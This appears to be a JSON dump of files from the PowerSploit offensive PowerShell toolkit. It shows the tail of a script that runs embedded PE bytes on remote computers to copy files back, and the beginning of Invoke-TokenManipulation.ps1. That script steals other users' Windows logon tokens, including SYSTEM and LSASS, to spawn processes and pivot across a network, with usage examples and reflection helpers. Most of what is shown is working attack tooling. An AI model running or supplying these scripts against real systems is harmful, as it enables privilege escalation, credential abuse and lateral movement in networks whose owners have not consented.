AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\"\n    [UInt64]$Offset = 0\n    \n\n\tif ($ComputerName -eq $null -or $ComputerName -imatch \"^\\s*$\")\n\t{\n        if ($PsCmdlet.ParameterSetName -ieq \"LocalDest\")\n        {\n            $RemoteDestination = $LocalDestination   #More efficient when using $RemoteDestination, only opens read handle once\n        }\n\n\t\tInvoke-Command -ScriptBlock $RemoteScriptBlock -ArgumentList @($PEBytes32, $PEBytes64, $Path, $RemoteDestination, $BufferSize, $Offset)\n\t}\n\telse\n\t{\n        if ($PsCmdlet.ParameterSetName -ieq \"LocalDest\")\n        {\n            $RemoteDestination = $null\n        }\n\n        #If localdestination, loop and increment offset until the entire file is read\n        do\n        {\n\t\t    $Result = Invoke-Command -ScriptBlock $RemoteScriptBlock -ArgumentList @($PEBytes32, $PEBytes64, $Path, $RemoteDestination, $BufferSize, $Offset) -ComputerName $ComputerName\n            if ($Result -eq $null)\n            {\n                return $null\n            }\n            $BytesLeft = $Result.BytesLeft\n\n\t\t\t$FileStream = New-Object System.IO.FileStream $LocalDestination,([System.IO.FileMode]::Append)\n\t\t\t$FileStream.Seek(0, [System.IO.SeekOrigin]::End) | Out-Null\n\t\t\t$FileStream.Write($Result.Bytes, 0, $Result.BytesRead) | Out-Null\n\t\t\t$FileStream.Flush() | Out-Null\n\t\t\t$FileStream.Dispose() | Out-Null\n\t\t\t$FileStream = $null\n\n            $Offset += $Result.BytesRead\n\n            Write-Verbose \"Copied $Offset bytes. $BytesLeft Bytes remaining\"\n        } while ($Result.BytesLeft -gt 0)\n\t}\n}\n\nMain\n\n[GC]::Collect()\n[GC]::Collect()\n}\n"
  },
  {
    "path": "Exfiltration/Invoke-TokenManipulation.ps1",
    "content": "function Invoke-TokenManipulation\n{\n<#\n.SYNOPSIS\n\nThis script requires Administrator privileges. It can enumerate the Logon Tokens available and use them to create new processes. This allows you to use\nanothers users credentials over the network by creating a process with their logon token. This will work even with Windows 8.1 LSASS protections.\nThis functionality is very similar to the incognito tool (with some differences, and different use goals).\n\nThis script can also make the PowerShell thread impersonate another users Logon Token. Unfortunately this doesn't work well, because PowerShell\ncreates new threads to do things, and those threads will use the Primary token of the PowerShell process (your original token) and not the token\nthat one thread is impersonating. Because of this, you cannot use thread impersonation to impersonate a user and then use PowerShell remoting to connect\nto another server as that user (it will authenticate using the primary token of the process, which is your original logon token).\n\nBecause of this limitation, the recommended way to use this script is to use CreateProcess to create a new PowerShell process with another users Logon \nToken, and then use this process to pivot. This works because the entire process is created using the other users Logon Token, so it will use their\ncredentials for the authentication.\n\nIMPORTANT: If you are creating a process, by default this script will modify the ACL of the current users desktop to allow full control to \"Everyone\". \nThis is done so that the UI of the process is shown. If you do not need the UI, use the -NoUI flag to prevent the ACL from being modified. This ACL\nis not permenant, as in, when the current logs off the ACL is cleared. It is still preferrable to not modify things unless they need to be modified though,\nso I created the NoUI flag. ALSO: When creating a process, the script will request SeSecurityPrivilege so it can enumerate and modify the ACL of the desktop.\nThis could show up in logs depending on the level of monitoring.\n\n\nPERMISSIONS REQUIRED:\nSeSecurityPrivilege: Needed if launching a process with a UI that needs to be rendered. Using the -NoUI flag blocks this.\nSeAssignPrimaryTokenPrivilege : Needed if launching a process while the script is running in Session 0.\n\n\nImportant differences from incognito:\nFirst of all, you should probably read the incognito white paper to understand what incognito does. If you use incognito, you'll notice it differentiates\nbetween \"Impersonation\" and \"Delegation\" tokens. This is because incognito can be used in situations where you get remote code execution against a service\nwhich has threads impersonating multiple users. Incognito can enumerate all tokens available to the service process, and impersonate them (which might allow\nyou to elevate privileges). This script must be run as administrator, and because you are already an administrator, the primary use of this script is for pivoting\nwithout dumping credentials. \n\nIn this situation, Impersonation vs Delegation does not matter because an administrator can turn any token in to a primary token (delegation rights). What does\nmatter is the logon type used to create the logon token. If a user connects using Network Logon (aka type 3 logon), the computer will not have any credentials for \nthe user. Since the computer has no credentials associated with the token, it will not be possible to authenticate off-box with the token. All other logon types\nshould have credentials associated with them (such as Interactive logon, Service logon, Remote interactive logon, etc). Therefore, this script looks\nfor tokens which were created with desirable logon tokens (and only displays them by default).\n\nIn a nutshell, instead of worrying about \"delegation vs impersonation\" tokens, you should worry about NetworkLogon (bad) vs Non-NetworkLogon (good).\n\n\nPowerSploit Function: Invoke-TokenManipulation\nAuthor: Joe Bialek, Twitter: @JosephBialek\nLicense: BSD 3-Clause\nRequired Dependencies: None\nOptional Dependencies: None\n\n.DESCRIPTION\n\nLists available logon tokens. Creates processes with other users logon tokens, and impersonates logon tokens in the current thread.\n\n.PARAMETER Enumerate\n\nSwitch. Specifics to enumerate logon tokens available. By default this will only list unqiue usable tokens (not network-logon tokens).\n\n.PARAMETER RevToSelf\n\nSwitch. Stops impersonating an alternate users Token.\n\n.PARAMETER ShowAll\n\nSwitch. Enumerate all Logon Tokens (including non-unique tokens and NetworkLogon tokens).\n\n.PARAMETER ImpersonateUser\n\nSwitch. Will impersonate an alternate users logon token in the PowerShell thread. Can specify the token to use by Username, ProcessId, or ThreadId.\n    This mode is not recommended because PowerShell is heavily threaded and many actions won't be done in the current thread. Use CreateProcess instead.\n\t\n.PARAMETER CreateProcess\n\nSpecify a process to create with an alternate users logon token. Can specify the token to use by Username, ProcessId, or ThreadId.\n\t\n.PARAMETER WhoAmI\n\nSwitch. Displays the credentials the PowerShell thread is running under.\n\n.PARAMETER Username\n\nSpecify the Token to use by username. This will choose a non-NetworkLogon token belonging to the user.\n\n.PARAMETER ProcessId\n\nSpecify the Token to use by ProcessId. This will use the primary token of the process specified.\n\n.PARAMETER Process\n\nSpecify the token to use by process object (will use the processId under the covers). This will impersonate the primary token of the process.\n\n.PARAMETER ThreadId\n\nSpecify the Token to use by ThreadId. This will use the token of the thread specified.\n\n.PARAMETER ProcessArgs\n\nSpecify the arguments to start the specified process with when using the -CreateProcess mode.\n\n.PARAMETER NoUI\n\nIf you are creating a process which doesn't need a UI to be rendered, use this flag. This will prevent the script from modifying the Desktop ACL's of the \ncurrent user. If this flag isn't set and -CreateProcess is used, this script will modify the ACL's of the current users desktop to allow full control\nto \"Everyone\".\n\n.PARAMETER PassThru\n\nIf you are creating a process, this will pass the System.Diagnostics.Process object to the pipeline.\n\n\t\n.EXAMPLE\n\nInvoke-TokenManipulation -Enumerate\n\nLists all unique usable tokens on the computer.\n\n.EXAMPLE\n\nInvoke-TokenManipulation -CreateProcess \"cmd.exe\" -Username \"nt authority\\system\"\n\nSpawns cmd.exe as SYSTEM.\n\n.EXAMPLE\n\nInvoke-TokenManipulation -ImpersonateUser -Username \"nt authority\\system\"\n\nMakes the current PowerShell thread impersonate SYSTEM.\n\n.EXAMPLE\n\nInvoke-TokenManipulation -CreateProcess \"cmd.exe\" -ProcessId 500\n\nSpawns cmd.exe using the primary token belonging to process ID 500.\n\n.EXAMPLE\n\nInvoke-TokenManipulation -ShowAll\n\nLists all tokens available on the computer, including non-unique tokens and tokens created using NetworkLogon.\n\n.EXAMPLE\n\nInvoke-TokenManipulation -CreateProcess \"cmd.exe\" -ThreadId 500\n\nSpawns cmd.exe using the token belonging to thread ID 500.\n\n.EXAMPLE\n\nGet-Process wininit | Invoke-TokenManipulation -CreateProcess \"cmd.exe\"\n\nSpawns cmd.exe using the primary token of LSASS.exe. This pipes the output of Get-Process to the \"-Process\" parameter of the script.\n\n.EXAMPLE\n\n(Get-Process wininit | Invoke-TokenManipulation -CreateProcess \"cmd.exe\" -PassThru).WaitForExit()\n\nSpawns cmd.exe using the primary token of LSASS.exe. Then holds the spawning PowerShell session until that process has exited.\n\n.EXAMPLE\n\nGet-Process wininit | Invoke-TokenManipulation -ImpersonateUser\n\nMakes the current thread impersonate the lsass security token.\n\n.NOTES\nThis script was inspired by incognito. \n\nSeveral of the functions used in this script were written by Matt Graeber(Twitter: @mattifestation, Blog: http://www.exploit-monday.com/).\nBIG THANKS to Matt Graeber for helping debug.\n\n.LINK\n\nBlog: http://clymb3r.wordpress.com/\nGithub repo: https://github.com/clymb3r/PowerShell\nBlog on this script: http://clymb3r.wordpress.com/2013/11/03/powershell-and-token-impersonation/\n\n#>\n\n    [CmdletBinding(DefaultParameterSetName=\"Enumerate\")]\n    Param(\n        [Parameter(ParameterSetName = \"Enumerate\")]\n        [Switch]\n        $Enumerate,\n\n        [Parameter(ParameterSetName = \"RevToSelf\")]\n        [Switch]\n        $RevToSelf,\n\n        [Parameter(ParameterSetName = \"ShowAll\")]\n        [Switch]\n        $ShowAll,\n\n        [Parameter(ParameterSetName = \"ImpersonateUser\")]\n        [Switch]\n        $ImpersonateUser,\n\n        [Parameter(ParameterSetName = \"CreateProcess\")]\n        [String]\n        $CreateProcess,\n\n        [Parameter(ParameterSetName = \"WhoAmI\")]\n        [Switch]\n        $WhoAmI,\n\n        [Parameter(ParameterSetName = \"ImpersonateUser\")]\n        [Parameter(ParameterSetName = \"CreateProcess\")]\n        [String]\n        $Username,\n\n        [Parameter(ParameterSetName = \"ImpersonateUser\")]\n        [Parameter(ParameterSetName = \"CreateProcess\")]\n        [Int]\n        $ProcessId,\n\n        [Parameter(ParameterSetName = \"ImpersonateUser\", ValueFromPipeline=$true)]\n        [Parameter(ParameterSetName = \"CreateProcess\", ValueFromPipeline=$true)]\n        [System.Diagnostics.Process]\n        $Process,\n\n        [Parameter(ParameterSetName = \"ImpersonateUser\")]\n        [Parameter(ParameterSetName = \"CreateProcess\")]\n        $ThreadId,\n\n        [Parameter(ParameterSetName = \"CreateProcess\")]\n        [String]\n        $ProcessArgs,\n\n        [Parameter(ParameterSetName = \"CreateProcess\")]\n        [Switch]\n        $NoUI,\n\n        [Parameter(ParameterSetName = \"CreateProcess\")]\n        [Switch]\n        $PassThru\n    )\n   \n    Set-StrictMode -Version 2\n\n\t#Function written by Matt Graeber, Twitter: @mattifestation, Blog: http://www.exploit-monday.com/\n\tFunction Get-DelegateType\n\t{\n\t    Param\n\t    (\n\t        [OutputType([Type])]\n\t        \n\t        [Parameter( Position = 0)]\n\t        [Type[]]\n\t        $Parameters = (New-Object Type[](0)),\n\t        \n\t        [Parameter( Position = 1 )]\n\t        [Type]\n\t        $ReturnType = [Void]\n\t    )\n\n\t    $Domain = [AppDomain]::CurrentDomain\n\t    $DynAssembly = New-Object System.Reflection.AssemblyName('ReflectedDelegate')\n\t    $AssemblyBuilder = $Domain.DefineDynamicAssembly($DynAssembly, [System.Reflection.Emit.AssemblyBuilderAccess]::Run)\n\t    $ModuleBuilder = $AssemblyBuilder.DefineDynamicModule('InMemoryModule', $false)\n\t    $TypeBuilder = $ModuleBuilder.DefineType('MyDelegateType', 'Class, Public, Sealed, AnsiClass, AutoClass', [System.MulticastDelegate])\n\t    $ConstructorBuilder = $TypeBuilder.DefineConstructor('RTSpecialName, HideBySig, Public', [System.Reflection.CallingConventions]::Standard, $Parameters)\n\t    $ConstructorBuilder.SetImplementationFlags('Runtime, Managed')\n\t    $MethodBuilder = $TypeBuilder.DefineMethod('Invoke', 'Public, HideBySig, NewSlot, Virtual', $ReturnType, $Parameters)\n\t    $MethodBuilder.SetImplementationFlags('Runtime, Managed')\n\t    \n\t    Write-Output $TypeBuilder.CreateType()\n\t}\n\n\n\t#Function written by Matt Graeber, Twitter: @mattifestation, Blog: http://www.exploit-monday.com/\n\tFunction Get-ProcAddress\n\t{\n\t    Param\n\t    (\n\t        [OutputType([IntPtr])]\n\t    \n\t        [Parameter( Position = 0, Mandatory = $True )]\n\t        [String]\n\t        $Module,\n\t        \n\t        [Parameter( Position = 1, Mandatory = $True )]\n\t        [String]\n\t        $Procedure\n\t    )\n\n\t    # Get a reference to System.dll in the GAC\n\t    $SystemAssembly = [AppDomain]::CurrentDomain.GetAssemblies() |\n\t        Where-Object { $_.GlobalAssemblyCache -And $_.Location.Split('\\\\')[-1].Equals('System.dll') }\n\t    $UnsafeNativeMethods = $SystemAssembly.GetType('Microsoft.Win32.UnsafeNativeMethods')\n\t    # Get a reference to the GetModuleHandle and GetProcAddress methods\n\t    $GetModuleHandle = $UnsafeNativeMethods.GetMethod('GetModuleHandle')\n\t    $GetProcAddress = $UnsafeNativeMethods.GetMethod('GetProcAddress')\n\t    # Get a handle to the module specified\n\t    $Kern32Handle = $GetModuleHandle.Invoke($null, @($Module))\n\t    $tmpPtr = New-Object IntPtr\n\t    $HandleRef = New-Object System.Runtime.InteropServices.HandleRef($tmpPtr, $Kern32Handle)\n\n\t    # Return the address of the function\n\t    Write-Output $GetProcAddress.Invoke($null, @([System.Runtime.InteropServices.HandleRef]$HandleRef, $Procedure))\n\t}\n\n    ###############################\n    #Win32Constants\n    ###############################\n    $Constants = @{\n        ACCESS_SYSTEM_SECURITY = 0x01000000\n        READ_CONTROL = 0x00020000\n        SYNCHRONIZE = 0x00100000\n        STANDARD_RIGHTS_ALL = 0x001F0000\n        TOKEN_QUERY = 8\n        TOKEN_ADJUST_PRIVILEGES = 0x20\n        ERROR_NO_TOKEN = 0x3f0\n        